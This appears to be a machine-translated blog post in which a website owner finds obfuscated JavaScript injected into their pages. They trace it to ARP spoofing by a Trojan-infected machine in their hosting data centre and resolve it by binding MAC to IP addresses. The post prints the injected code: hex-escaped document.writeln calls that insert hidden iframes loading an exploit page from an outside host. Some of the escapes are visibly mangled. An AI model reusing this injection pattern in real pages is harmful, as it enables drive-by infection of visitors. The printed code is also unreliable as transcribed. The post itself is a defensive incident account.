The illusion that the website has been hacked--Add a js_javascript technique to the ARP spoofing page

Last night I discovered that when I visited my website, there was a string of js code in front of the html code of the web page. At first I thought the website had been hacked, so I hurriedly went to the server to check whether all files contained this string of js code. The search results did not show up, and the server did not find any trace of being hacked.


So I can only start with this code, I download this js The development found the following code:

Copy code The code is as follows:

window["x64x6fx63x75x6dx65x6ex74" ]["x77x72x69x74x65x6cx6e"]("x3cx44x49x56 x73x74x79x6cx65x3d"x4 3x55x52x53x4fx52x3a x75x72x6cx28'x68x74x74x70x3a//x66x75x63x6b x2ex6ex73x32x67x6fx2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70x69x63/x31x2ex67x69x66'x29"x3e");
window["x64x6fx63x75x6dx65x6ex74 "]["x77x72x69x74x65x6cx6e"]("x3cx44x49x56 x73x74x79x6cx65x3d" x43x55x52x53x4fx52x3a x75x72x6cx28'x68x74x74x70x3a//x66x75x63x6bx2ex6ex73x32x67x6fx2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70 x69x63/x32x2ex67x69x66'x29"x3ex3c/x44x49x56x3ex3c/x44x49x56x3e"); "x3cx69x66x72x61x6dx65 x73x72x63x3dx68x74x74x70x3a//x66x75x63x6b 9x63/ x30x36x30x31x34x2ex68x74x6d x77x69x64x74x68x3dx31 x68x65x69x67x68x74x3dx31x3ex3c/x69x66x72x61x6dx65x3e");
window["x64x6fx63 x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx69x66x72x61x6dx65 x73x72x63x3dx68x74x74x70x3a//x66x75x63x6bx2ex6ex73x32x67x6fx 2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70x69x63/x74x6ax2ex68x74x6d x77x69x64x74x68x3dx30 66x72x61x6dx65x3e")

After searching on google, I found that someone has discovered the same situation. http://0e2.net/post/676.html
After reading this article, I learned that it was not the server that was hacked, but the computer room where the server is located. The host infected with the Trojan virus is engaging in arp spoofing.
After these Trojans captured the packets sent by my server, they tampered with the content of the packets and added the previous Trojan virus code to the HTML header. Then they forwarded it Host for users who visit my website. This Trojan targets the ani vulnerability of IE. Microsoft users’ computers must be upgraded and patched as soon as possible.
The final problem is how to prevent my server from being spoofed by ARP. Call the computer room , the technical staff asked us to bind the mac and ip addresses, and the problem was finally solved.
About ARP spoofing related knowledge:
http://zhidao.baidu.com/question/7980952.html?si=1